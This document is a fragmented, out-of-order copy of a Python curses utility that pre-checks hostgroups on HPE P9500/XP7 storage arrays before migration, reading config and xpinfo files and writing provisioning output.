"string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {}",
"start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK ended\") logger.info(\"#\" *",
"file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file",
"self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for",
":: position = {}, n = {}\".format(self.position,n )) ### adjust slice ### if",
"display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if",
"{}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set()",
"LOG : xpmig_precheck.log TODO : add generate temporary horcm file and daemon to",
"consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ###",
"0 self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end <",
"#################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup",
"curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title =",
"name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level =",
"consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to",
"in the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key =",
"slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position",
"to file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if key",
"ConfigParser import sys import os import os.path import csv import string import xp7",
"serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if",
"main(stdscr): ### clear screen ### stdscr.clear() ### check window heigth and width ###",
"= curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ###",
"< 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) -",
"upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >=",
"selection items list to match the new search criteria \"\"\" if self.search.get() !=",
"except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not",
"hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam VERSION : Based",
"self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir",
"panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1)",
"= min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self):",
"self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\") key",
"site_dict = {} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS ####################################################################################################",
"the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start",
"selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row",
"title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ###",
"self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def",
"self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear() line",
"= xpinfo_dir self.selection = selection def update(self): \"\"\" update the list of xpinfo",
"1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]:",
"try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try:",
"n if self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position",
"> 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) -",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n): if n",
"except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except:",
"consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now",
"self.slice_end = self.slice_start + self.slice_len elif n > 0: if self.slice_end < len(self.display_list)",
"0: if self.slice_start >= 1: self.slice_start += n if self.slice_start < 0: self.slice_start",
"\"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1)",
"0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position +=",
"XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs",
"title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win",
"mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line",
"> 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) -",
"+ self.slice_len self.position = 0 def navigate(self,n): self.position += n if self.position <",
"= \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width:",
"clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window",
"self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg)",
"box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report =",
"window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items = items",
"= panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection",
"consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup",
"= len(self.filtered_items) - 1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice",
"if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str):",
"list to match the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update",
"not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name",
"log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log file dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir",
"logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions)",
"- self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate()",
"key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP",
"for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list =",
"True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files ### for",
"short to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for",
"def clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr):",
"def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width =",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to",
"self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key ==",
"linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict)",
"def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del",
"len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len",
"def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line)",
"### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP>",
"exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\")",
"for x in self.selection])) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border()",
"= os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels()",
"len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr",
"= ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear))",
"0 elif self.position >= len(self.items): self.position = len(self.items) - 1 def display(self): self.panel.top()",
"large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE",
": add generate temporary horcm file and daemon to pairdisplay & check on",
"known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too",
"panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear()",
"for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file",
"window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear()",
"window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len",
"1 self.slice_start = self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end",
"open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) >",
"= line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def",
"### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window =",
"= text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear()",
"hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name]",
"= self.window.getmaxyx() self.title = title self.search_str = \"\" def display(self): self.window.clear() line =",
"summary menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency",
"self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in",
"if box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No site defined",
"len(self.xpinfo_file_list) - 1 if n < 0: if self.position - self.slice_start < 2",
"if self.position == len(self.items) - 1: break else: self.items[self.position][1]() elif key == curses.KEY_UP:",
"stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set",
"##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter =",
"self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str",
"box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict = {} for box_name in boxpair_dict[boxpair_name]:",
"HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1)",
"criteria 1.3 Add config file 2.0 Consistency check update 2.1 Add xpinfo file",
"* linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\")",
"addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: # logger.debug(\"SelectMenu.display :: index",
"to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ###",
"= len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate()",
"exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\")",
"collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir",
"#!/usr/bin/python \"\"\" #################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to",
"for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict:",
"hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for box_name in hostgroup_dict:",
"self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"= instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for box {},",
"add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:]",
"try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except:",
"enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line",
"index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode =",
"addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in",
"and width ### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not",
">= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0: if self.position",
"{} serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict = {}",
"self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]:",
"curses import panel import re import logging import logging.handlers import copy from ConfigParser",
"= box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list:",
"be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ### for serial_nbr in",
"self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position",
"box_dict = {} #################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object):",
"in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for box_name,hostgroup_name in",
"self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not",
"### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict = {} instance_dict",
"self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end",
"if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line",
"settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\")",
"len(line) >= self.width: line = line[:self.width-1] ### only add lines in the slice",
"defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in",
"update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0",
"for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode",
"is ready for migration AUTHOR : <NAME> / StorageTeam VERSION : Based on",
"value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\")",
"\"\"\" import curses from curses import panel import re import logging import logging.handlers",
"menu ### hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu",
"\"No HORCM instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\")",
"self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode =",
"if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items)",
"box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object",
"= xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start",
"def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line =",
"xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ### hostgroup_summary",
"= title self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for",
"f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname",
"try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except:",
"boxpair_dict = {} serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict",
"slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end -",
"try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except:",
"horcm file and daemon to pairdisplay & check on status #################################################################################################### \"\"\" import",
"= set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by",
"= \"No site defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1)",
"for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name))",
"Precheck DESCRIPTION : Precheck to examine hostgroup is ready for migration AUTHOR :",
"while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo files ###",
"select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ### define consistent_win ### consistent_win",
"Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width:",
"= self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide()",
"name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value",
"= [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n):",
"add lines in the slice ### if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode)",
"= window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = [] def display(self):",
"self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width",
"class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is",
"= set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def",
"self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\") key =",
"row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N",
"### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if",
"for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] =",
"#key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN",
"CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm file",
"self.position = 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if",
"### only add lines in the slice ### if self.slice_start <= index <=",
"def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class Consistent(object): def",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def",
"self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items):",
"+ \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg =",
"> 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in",
"define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH",
"len(self.display_list) - 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len",
"{}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position < 2 and",
"name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value",
"= [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x",
"self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide",
"if key in [ord(\"b\"),ord(\"B\")]: break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.xpinfo_file_list)",
"in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr):",
"if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in",
"### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### ####################",
"ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in",
"if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply =",
"= search def update(self): \"\"\" update the selection items list to match the",
"curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel",
"0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position",
"<= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key",
"update items to match search str {}\".format(self.search.get())) self.filtered_items = [x for x in",
"not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display))",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj def",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show",
"< 0: if self.slice_start >= 1: self.slice_start += n if self.slice_start < 0:",
"curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif",
"key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate()",
"write out the ldevs to file ### for box_name,hostgroup_name in self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name):",
"{}, n = {}\".format(self.position,n )) ### adjust slice ### if n < 0:",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len =",
"### MAIN #################################################################################################### def main(stdscr): ### clear screen ### stdscr.clear() ### check window",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width =",
"select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ###",
"panel import re import logging import logging.handlers import copy from ConfigParser import ConfigParser",
"self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items = items self.filtered_items",
"sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if",
"consistent def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start +=",
